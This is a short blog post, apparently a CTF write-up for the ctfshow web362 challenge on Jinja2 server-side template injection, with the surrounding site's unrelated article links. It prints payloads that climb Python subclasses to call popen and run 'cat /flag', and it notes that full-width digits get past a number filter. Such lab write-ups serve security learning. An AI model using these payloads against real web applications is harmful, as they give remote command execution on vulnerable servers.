当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到這一步都是正常的
從12開始就沒用了
數字出現了問題,看wp用全角數字代替正常數字繞過
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然後應該可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- Introduction to QT programming
- 使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
- Jeecg boot microservice architecture
- ESP32 LVGL8. 1 - BTN button (BTN 15)
- 昇腾 AI 开发者创享日全国巡回首站在西安成功举行
- Daily CISSP certification common mistakes (April 11, 2022)
- CISSP certified daily knowledge points (April 19, 2022)
- 串口调试工具cutecom和minicom
- Linux installs MySQL in RPM (super simple)
- Daily CISSP certification common mistakes (April 15, 2022)
猜你喜欢
机器学习理论之(8):模型集成 Ensemble Learning
多功能工具箱微信小程序源码
Function recursion and solving interesting problems
Robocode tutorial 8 - advanced robot
QT add external font ttf
使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
STM32学习记录0008——GPIO那些事1
Nodejs安装
Quantexa CDI(场景决策智能)Syneo平台介绍
随机推荐
Use bitnami / PostgreSQL repmgr image to quickly set up PostgreSQL ha
Using transmittablethreadlocal to realize parameter cross thread transmission
Multi thread safe reference arc of rust
线上怎么确定期货账户安全的?
昇腾 AI 开发者创享日全国巡回首站在西安成功举行
【ACM】376. 摆动序列
Closure type of rust (difference between FN, fnmut and fnone)
Test post and login function
Robocode Tutorial 4 - robocode's game physics
使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
ESP32 LVGL8. 1 - BTN button (BTN 15)
According to the result set queried by SQL statement, it is encapsulated as JSON
14个py小游戏源代码分享第二弹
Mysqldump backup database
Mode of interprocess communication
Function recursion and solving interesting problems
Daily network security certification test questions (April 18, 2022)
Resolves the interface method that allows annotation requests to be written in postman
Daily CISSP certification common mistakes (April 12, 2022)